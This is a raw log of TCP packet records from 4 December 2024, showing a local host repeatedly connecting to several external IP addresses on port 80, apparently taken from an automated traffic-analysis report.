Dec 4, 2024 12:50:25.216082096 CET  49808  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:25.335988998 CET  80  49808  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:26.722193003 CET  49808  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:26.842736006 CET  80  49808  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:26.842845917 CET  49808  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:27.740612984 CET  49816  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:27.860461950 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:27.860569000 CET  49816  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:27.880558014 CET  49816  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:28.001234055 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:28.001297951 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:28.001351118 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:28.001398087 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:28.001507044 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:28.001527071 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:28.001671076 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:28.001682043 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:28.001718044 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:29.394193888 CET  49816  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:29.514286041 CET  80  49816  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:29.514437914 CET  49816  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:30.410192013 CET  49825  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:30.530025959 CET  80  49825  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:30.530107021 CET  49825  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:30.539558887 CET  49825  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:30.659403086 CET  80  49825  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:31.856322050 CET  80  49825  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:31.856381893 CET  80  49825  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:31.856451035 CET  49825  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:31.859637022 CET  49825  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:31.979423046 CET  80  49825  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:37.454211950 CET  49841  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:37.574032068 CET  80  49841  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:37.578353882 CET  49841  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:37.639204025 CET  49841  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:37.759126902 CET  80  49841  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:38.879081964 CET  80  49841  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:38.879093885 CET  80  49841  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:38.879151106 CET  49841  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:39.142213106 CET  49841  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:40.275652885 CET  49847  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:40.395487070 CET  80  49847  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:40.395642042 CET  49847  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:40.440781116 CET  49847  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:40.560606003 CET  80  49847  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:41.691081047 CET  80  49847  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:41.691427946 CET  80  49847  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:41.691760063 CET  49847  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:41.953777075 CET  49847  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:42.994796038 CET  49853  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:43.114639997 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:43.115653038 CET  49853  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:43.139472008 CET  49853  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:43.259356022 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:43.259368896 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:43.259432077 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:43.259476900 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:43.259690046 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:43.259707928 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:43.259912014 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:43.259932995 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:43.259988070 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:44.412031889 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:44.412064075 CET  80  49853  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:44.412120104 CET  49853  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:44.641266108 CET  49853  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:45.664110899 CET  49862  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:45.784176111 CET  80  49862  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:45.784250975 CET  49862  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:45.873195887 CET  49862  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:45.993036985 CET  80  49862  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:47.033354044 CET  80  49862  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:47.033447027 CET  80  49862  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:47.033657074 CET  49862  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:47.036109924 CET  49862  80  192.168.2.4  185.27.134.144
Dec 4, 2024 12:50:47.155797005 CET  80  49862  185.27.134.144  192.168.2.4
Dec 4, 2024 12:50:52.392066002 CET  49879  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:52.511960983 CET  80  49879  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:52.512043953 CET  49879  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:52.529640913 CET  49879  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:52.649555922 CET  80  49879  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:54.031934977 CET  49879  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:54.112263918 CET  80  49879  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:54.112297058 CET  80  49879  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:54.112329960 CET  49879  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:54.112365961 CET  49879  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:54.151737928 CET  80  49879  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:54.151798010 CET  49879  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:55.050493002 CET  49885  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:55.170280933 CET  80  49885  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:55.170429945 CET  49885  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:55.186243057 CET  49885  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:55.305934906 CET  80  49885  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:56.412210941 CET  80  49885  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:56.413378000 CET  80  49885  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:56.413444996 CET  49885  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:56.688173056 CET  49885  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:57.707483053 CET  49891  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:57.827395916 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:57.827471018 CET  49891  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:57.844650030 CET  49891  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:57.964976072 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:57.964993954 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:57.965085983 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:57.965147018 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:57.965157032 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:57.965174913 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:57.965270042 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:57.965289116 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:57.965338945 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:59.101582050 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:59.101742029 CET  80  49891  104.21.95.160  192.168.2.4
Dec 4, 2024 12:50:59.102268934 CET  49891  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:50:59.486268044 CET  49891  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:51:00.505547047 CET  49897  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:51:00.625252008 CET  80  49897  104.21.95.160  192.168.2.4
Dec 4, 2024 12:51:00.625334024 CET  49897  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:51:00.636545897 CET  49897  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:51:00.756221056 CET  80  49897  104.21.95.160  192.168.2.4
Dec 4, 2024 12:51:02.253109932 CET  80  49897  104.21.95.160  192.168.2.4
Dec 4, 2024 12:51:02.253731012 CET  80  49897  104.21.95.160  192.168.2.4
Dec 4, 2024 12:51:02.253783941 CET  49897  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:51:02.287425995 CET  49897  80  192.168.2.4  104.21.95.160
Dec 4, 2024 12:51:02.407605886 CET  80  49897  104.21.95.160  192.168.2.4
Dec 4, 2024 12:51:07.638256073 CET  49916  80  192.168.2.4  104.21.57.248
Dec 4, 2024 12:51:07.758480072 CET  80  49916  104.21.57.248  192.168.2.4
Dec 4, 2024 12:51:07.758549929 CET  49916  80  192.168.2.4  104.21.57.248
Dec 4, 2024 12:51:07.776355982 CET  49916  80  192.168.2.4  104.21.57.248
Dec 4, 2024 12:51:07.896102905 CET  80  49916  104.21.57.248  192.168.2.4
Dec 4, 2024 12:51:09.201139927 CET  80  49916  104.21.57.248  192.168.2.4
                                                                  Dec 4, 2024 12:51:09.201184988 CET8049916104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:09.203109026 CET4991680192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:09.282264948 CET4991680192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:10.301515102 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:10.421711922 CET8049924104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:10.421799898 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:10.439372063 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:10.559253931 CET8049924104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:11.872011900 CET8049924104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:11.872153997 CET8049924104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:11.872200012 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:11.953915119 CET4992480192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:12.972723961 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:13.094368935 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.096782923 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:13.112694979 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:13.232621908 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232636929 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232712030 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232729912 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232800007 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232809067 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232835054 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232882977 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:13.232892990 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:14.513961077 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:14.514751911 CET8049930104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:14.514791965 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:14.625747919 CET4993080192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:15.644273996 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:15.764342070 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:15.764422894 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:15.775770903 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:15.896028042 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:17.195595026 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:17.195938110 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:17.199007988 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:17.199007988 CET4993580192.168.2.4104.21.57.248
                                                                  Dec 4, 2024 12:51:17.318767071 CET8049935104.21.57.248192.168.2.4
                                                                  Dec 4, 2024 12:51:22.890281916 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:23.011066914 CET8049953154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:23.011230946 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:23.026318073 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:23.147392035 CET8049953154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:24.516977072 CET8049953154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:24.517057896 CET8049953154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:24.517113924 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:24.532020092 CET4995380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:25.550787926 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:25.670851946 CET8049960154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:25.674365997 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:25.690303087 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:25.810277939 CET8049960154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:27.188056946 CET8049960154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:27.188070059 CET8049960154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:27.188205957 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:27.206296921 CET4996080192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:28.225339890 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:28.345076084 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.345144033 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:28.364144087 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:28.484081030 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484091043 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484121084 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484138012 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484257936 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484266996 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484282970 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484291077 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:28.484358072 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:29.875735998 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:29.995915890 CET8049967154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:29.995965958 CET4996780192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:30.898305893 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:31.018191099 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:31.018338919 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:31.027718067 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:31.147751093 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:32.536885023 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:32.537178040 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:32.537230015 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:32.540070057 CET4997380192.168.2.4154.88.22.101
                                                                  Dec 4, 2024 12:51:32.659941912 CET8049973154.88.22.101192.168.2.4
                                                                  Dec 4, 2024 12:51:38.036015987 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:38.155699015 CET8049989209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:38.155761957 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:38.176188946 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:38.296099901 CET8049989209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:39.434420109 CET8049989209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:39.434689045 CET8049989209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:39.434909105 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:39.688294888 CET4998980192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:40.706975937 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:40.827111006 CET8049998209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:40.830374956 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:40.846318960 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:40.966115952 CET8049998209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:42.097157955 CET8049998209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:42.097255945 CET8049998209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:42.097305059 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:42.363135099 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:43.379414082 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:43.499221087 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.499424934 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:43.514550924 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:43.637729883 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637742996 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637758970 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637768030 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637839079 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637856007 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637940884 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637994051 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.638041019 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:44.806919098 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:44.807110071 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:44.812561989 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:45.054011106 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:46.067132950 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:46.187078953 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:46.187241077 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:46.201370955 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:46.321198940 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:47.415009975 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:47.415558100 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:47.416117907 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:47.417943001 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:47.537879944 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:52:05.415483952 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:05.535396099 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:05.535586119 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:05.550359011 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:05.670639992 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:06.692665100 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:06.692759037 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:06.692770004 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:06.692831039 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:07.063324928 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:08.083012104 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:08.202817917 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:08.202944040 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:08.220882893 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:08.340594053 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:09.364029884 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:09.364093065 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:09.364227057 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:09.364648104 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:09.364761114 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:09.736571074 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:10.755289078 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:10.875293970 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:10.875391960 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:10.892441034 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:11.012470961 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012532949 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012748003 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012826920 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012922049 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012938023 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.013055086 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.013114929 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.013191938 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.088907003 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.089037895 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.089087963 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:12.089854002 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.090009928 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.090064049 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:12.391478062 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:13.427467108 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:13.547350883 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:13.547976971 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:13.560717106 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:13.680671930 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.720558882 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.720679045 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.720691919 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.720776081 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:14.721014023 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.721064091 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:14.725480080 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:14.845180988 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:22.503776073 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:22.626266003 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:22.626349926 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:22.645529985 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:22.769809961 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:24.157273054 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:24.186882019 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:24.186897993 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:24.186944962 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:24.186960936 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:24.277054071 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:24.277108908 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:25.178699970 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:25.298810959 CET805004220.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:25.299597979 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:25.332273960 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:25.452311993 CET805004220.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:26.816433907 CET805004220.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:26.816452980 CET805004220.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:26.816512108 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:26.844629049 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:27.863266945 CET5004380192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:27.985069036 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:27.985265970 CET5004380192.168.2.420.2.249.7
